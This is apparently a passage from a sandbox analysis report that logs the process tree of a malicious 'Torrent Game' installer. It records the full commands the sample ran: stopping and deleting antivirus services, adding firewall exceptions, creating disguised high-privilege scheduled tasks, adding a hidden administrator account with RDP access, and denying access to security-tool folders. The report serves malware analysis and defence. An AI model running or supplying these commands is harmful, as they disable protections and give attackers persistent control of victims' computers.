  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --mojo-platform-channel-handle=4892 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:1
  2⤵
  PID:2208
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --mojo-platform-channel-handle=5100 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:1
  2⤵
  PID:760
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1104 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:8
  2⤵
  PID:2552
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4364 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:8
  2⤵
  PID:2436
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4628 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:8
  2⤵
  PID:2800
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5112 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:8
  2⤵
  PID:1440
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5352 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:8
  2⤵
  PID:2352
- C:\Users\Admin\Downloads\qbittorrent_4.1.9_setup.exe
  "C:\Users\Admin\Downloads\qbittorrent_4.1.9_setup.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Program Files directory
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:1956
- - C:\Program Files (x86)\qBittorrent\qbittorrent.exe
    "C:\Program Files (x86)\qBittorrent\qbittorrent.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Modifies registry class
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of SetWindowsHookEx
    PID:2124
  - - C:\Users\Admin\Downloads\Torrent Game\Setup.exe
      "C:\Users\Admin\Downloads\Torrent Game\Setup.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Checks whether UAC is enabled
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      PID:896
  - - C:\Users\Admin\Downloads\Torrent Game\Setup.exe
      "C:\Users\Admin\Downloads\Torrent Game\Setup.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Checks whether UAC is enabled
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      PID:2812
  - - C:\Users\Admin\Downloads\Torrent Game\Setup.exe
      "C:\Users\Admin\Downloads\Torrent Game\Setup.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Checks whether UAC is enabled
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      PID:1476
    - - C:\Users\Admin\Downloads\Torrent Game\GameInstall.exe
        
        "C:\Users\Admin\Downloads\Torrent Game\GameInstall.exe"
        5⤵
        Executes dropped EXE
        Drops file in Program Files directory
        
        PID:2720
    - - C:\ProgramData\Setup\install.exe
        
        C:\ProgramData\Setup\install.exe -pputinxuilo6
        5⤵
        Executes dropped EXE
        
        PID:2396
      - C:\ProgramData\Setup\GameGuard.exe
        
        "C:\ProgramData\Setup\GameGuard.exe"
        6⤵
        Modifies Windows Defender Real-time Protection settings
        Modifies Windows Defender notification settings
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Blocks application from running via registry modification
        Checks BIOS information in registry
        Executes dropped EXE
        Checks whether UAC is enabled
        Modifies WinLogon
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:2936
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sc delete swprv
        7⤵
        
        PID:2768
        
        C:\Windows\system32\sc.exe
        
        sc delete swprv
        8⤵
        Launches sc.exe
        
        PID:1492
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sc stop mbamservice
        7⤵
        
        PID:2472
        
        C:\Windows\system32\sc.exe
        
        sc stop mbamservice
        8⤵
        Launches sc.exe
        
        PID:2548
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
        7⤵
        
        PID:2804
        
        C:\Windows\system32\sc.exe
        
        sc stop bytefenceservice
        8⤵
        Launches sc.exe
        
        PID:2636
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
        7⤵
        
        PID:2388
        
        C:\Windows\system32\sc.exe
        
        sc delete bytefenceservice
        8⤵
        Launches sc.exe
        
        PID:2996
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sc delete mbamservice
        7⤵
        
        PID:804
        
        C:\Windows\system32\sc.exe
        
        sc delete mbamservice
        8⤵
        Launches sc.exe
        
        PID:356
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sc delete crmsvc
        7⤵
        
        PID:2980
        
        C:\Windows\system32\sc.exe
        
        sc delete crmsvc
        8⤵
        Launches sc.exe
        
        PID:1956
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
        7⤵
        
        PID:1520
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state on
        8⤵
        Modifies Windows Firewall
        
        PID:872
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AppModule" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
        7⤵
        
        PID:2344
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="AppModule" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
        8⤵
        Modifies Windows Firewall
        
        PID:2468
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AMD" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
        7⤵
        
        PID:844
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="AMD" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
        8⤵
        Modifies Windows Firewall
        
        PID:2044
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
        7⤵
        
        PID:1952
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
        8⤵
        Modifies Windows Firewall
        
        PID:2276
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
        7⤵
        
        PID:1216
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
        8⤵
        Modifies Windows Firewall
        
        PID:2832
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
        7⤵
        
        PID:2116
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
        8⤵
        Modifies Windows Firewall
        
        PID:1564
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
        7⤵
        
        PID:3032
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
        8⤵
        Modifies Windows Firewall
        
        PID:676
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c gpupdate /force
        7⤵
        
        PID:1472
        
        C:\Windows\system32\gpupdate.exe
        
        gpupdate /force
        8⤵
        
        PID:352
        
        C:\Windows\system32\cmd.exe
        
        cmd /c C:\Programdata\Install\Delete.bat
        7⤵
        
        PID:2164
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        8⤵
        Delays execution with timeout.exe
        
        PID:2256
      - C:\ProgramData\Setup\update.exe
        
        "C:\ProgramData\Setup\update.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Drops file in Drivers directory
        Checks BIOS information in registry
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:2516
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\CleanCash" /TR "C:\Programdata\ReaItekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:648
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\FilesBackUP" /TR "C:\Programdata\ReaItekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:1572
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\SysFiles" /TR "C:\Windows\SysWOW64\unsecapp.exe" /SC MINUTE /MO 1 /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:1968
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\WinlogonCheck" /TR "C:\Programdata\ReaItekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:2012
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\OnlogonCheck" /TR "C:\Programdata\ReaItekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:2036
        
        C:\ProgramData\Microsoft\win.exe
        
        C:\ProgramData\Microsoft\win.exe -ppidar
        7⤵
        Executes dropped EXE
        
        PID:928
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\MasterDataA\RecoveryHosts" /TR "C:\ProgramData\Microsoft\Network\YjItXy5F\MasterDataA.bat" /SC ONLOGON /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:1684
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Hor" /TR "C:\ProgramData\Microsoft\Network\YjItXy5F\\Game.exe -ppidar" /SC ONCE /ST 9:50 /SD 05/05/2024 /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:756
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe " /c " & "icacls "C:\KVRT_Data" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:1568
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
        7⤵
        
        PID:1408
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
        8⤵
        
        PID:2472
        
        C:\ProgramData\Setup\svchost.exe
        
        C:\ProgramData\Setup\svchost.exe -ppidar
        7⤵
        Executes dropped EXE
        
        PID:2768
        
        C:\ProgramData\Setup\IP.exe
        
        "C:\ProgramData\Setup\IP.exe"
        8⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Blocklisted process makes network request
        Checks BIOS information in registry
        Executes dropped EXE
        Adds Run key to start application
        Checks whether UAC is enabled
        Drops file in System32 directory
        Suspicious use of NtSetInformationThreadHideFromDebugger
        NTFS ADS
        
        PID:2884
        
        C:\Windows\SysWOW64\unsecapp.exe
        
        C:\Windows\SysWOW64\unsecapp.exe
        9⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:2444
        
        C:\Windows\system32\cmd.exe
        
        cmd /c C:\Programdata\Microsoft\temp\H.bat
        9⤵
        Drops file in Drivers directory
        
        PID:2408
        
        C:\ProgramData\Setup\smss.exe
        
        "C:\ProgramData\Setup\smss.exe"
        8⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Drops file in Program Files directory
        Checks processor information in registry
        Modifies registry class
        NTFS ADS
        
        PID:356
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winsers" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC MINUTE /MO 1 /RL HIGHEST
        9⤵
        Creates scheduled task(s)
        
        PID:2620
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winser" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC ONLOGON /RL HIGHEST
        9⤵
        Creates scheduled task(s)
        
        PID:996
        
        C:\ProgramData\Windows Tasks Service\winserv.exe
        
        "C:\ProgramData\Windows Tasks Service\winserv.exe"
        9⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2464
        
        C:\ProgramData\Windows Tasks Service\winserv.exe
        
        "C:\ProgramData\Windows Tasks Service\winserv.exe" -second
        10⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1684
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c net user John 12345 /add
        9⤵
        
        PID:1616
        
        C:\Windows\system32\net.exe
        
        net user John 12345 /add
        10⤵
        
        PID:2344
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user John 12345 /add
        11⤵
        
        PID:2924
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c net localgroup "Администраторы" John /add
        9⤵
        
        PID:1944
        
        C:\Windows\system32\net.exe
        
        net localgroup "Администраторы" John /add
        10⤵
        
        PID:2836
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup "Администраторы" John /add
        11⤵
        
        PID:1716
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного рабочего стола" John /add
        9⤵
        
        PID:1904
        
        C:\Windows\system32\net.exe
        
        net localgroup "Пользователи удаленного рабочего стола" John /add
        10⤵
        
        PID:676
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
        11⤵
        
        PID:1268
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного управления" john /add" John /add
        9⤵
        
        PID:1528
        
        C:\Windows\system32\net.exe
        
        net localgroup "Пользователи удаленного управления" john /add" John /add
        10⤵
        
        PID:2948
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" john /add" John /add
        11⤵
        
        PID:2164
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c net localgroup "Administrators" John /add
        9⤵
        
        PID:2168
        
        C:\Windows\system32\net.exe
        
        net localgroup "Administrators" John /add
        10⤵
        
        PID:2508
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administrators" John /add
        11⤵
        
        PID:2496
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c net localgroup "Administradores" John /add
        9⤵
        
        PID:2036
        
        C:\Windows\system32\net.exe
        
        net localgroup "Administradores" John /add
        10⤵
        
        PID:1600
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administradores" John /add
        11⤵
        
        PID:3032
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c net localgroup "Remote Desktop Users" john /add
        9⤵
        
        PID:1196
        
        C:\Windows\system32\net.exe
        
        net localgroup "Remote Desktop Users" john /add
        10⤵
        
        PID:2720
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" john /add
        11⤵
        
        PID:2464
        
        C:\ProgramData\RDPWinst.exe
        
        C:\ProgramData\RDPWinst.exe -i
        9⤵
        Sets DLL path for service in the registry
        Executes dropped EXE
        Modifies WinLogon
        Drops file in Program Files directory
        
        PID:2944
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        10⤵
        Modifies Windows Firewall
        
        PID:3648
        
        C:\Windows\system32\cmd.exe
        
        cmd /c C:\Programdata\Install\del.bat
        9⤵
        
        PID:544
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        10⤵
        Delays execution with timeout.exe
        
        PID:3156
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:3764
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\Microsoft JDX" /deny "Admin":(OI)(CI)(F)
        8⤵
        
        PID:3824
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
        7⤵
        
        PID:3772
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:3816
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:3848
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny "Admin":(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:3928
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
        7⤵
        
        PID:3856
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
        8⤵
        
        PID:3920
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:3864
        
        C:\Windows\system32\icacls.exe
        
        icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny "Admin":(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:3936
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
        7⤵
        
        PID:3956
        
        C:\Windows\system32\icacls.exe
        
        icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
        8⤵
        
        PID:3980
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:3992
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\Fonts\Mysql" /deny "Admin":(OI)(CI)(F)
        8⤵
        
        PID:4020
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
        7⤵
        
        PID:4044
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:4068
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:4080
        
        C:\Windows\system32\icacls.exe
        
        icacls "c:\program files\Internet Explorer\bin" /deny "Admin":(OI)(CI)(F)
        8⤵
        
        PID:2620
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
        7⤵
        
        PID:4088
        
        C:\Windows\system32\icacls.exe
        
        icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:676
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe " /c " & "icacls "C:\Windows\speechstracing" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:1904
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
        7⤵
        
        PID:2344
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:3084
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe " /c " & "icacls "c:\programdata\Malwarebytes" /deny "%username%":(F)
        7⤵
        
        PID:1528
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
        7⤵
        
        PID:3116
        
        C:\Windows\system32\icacls.exe
        
        icacls c:\programdata\Malwarebytes /deny System:(F)
        8⤵
        Modifies file permissions
        
        PID:3120
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe " /c " & "icacls "C:\Programdata\MB3Install" /deny "%username%":(F)
        7⤵
        
        PID:3156
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
        7⤵
        
        PID:2060
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\Programdata\MB3Install /deny System:(F)
        8⤵
        
        PID:2216
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe " /c " & "icacls "C:\Programdata\Indus" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:548
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
        7⤵
        
        PID:1852
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
        8⤵
        
        PID:1448
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe " /c " & "icacls "C:\AdwCleaner" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:3224
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:3332
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\ByteFence" /deny "Admin":(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:3424
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe " /c " & "icacls "C:\KVRT2020_Data" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:3508
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)
        7⤵
        
        PID:1428
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:2396
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe " /c " & "icacls "C:\FRST" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:2884
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls C:\FRST /deny system:(OI)(CI)(F)
        7⤵
        
        PID:3548
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\FRST /deny system:(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:3532
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:3484
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\360" /deny "Admin":(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:3600
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:3608
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\360safe" /deny "Admin":(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:3640
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:3664
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\SpyHunter" /deny "Admin":(OI)(CI)(F)
        8⤵
        
        PID:2880
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:3560
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Malwarebytes" /deny "Admin":(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:3720
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:3708
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\COMODO" /deny "Admin":(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:1768
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:3760
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Enigma Software Group" /deny "Admin":(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:3824
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:3768
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\SpyHunter" /deny "Admin":(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:3804
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:3892
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\AVAST Software" /deny "Admin":(OI)(CI)(F)
        8⤵
        
        PID:3908
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:3976
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\AVAST Software" /deny "Admin":(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:4016
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:3996
        
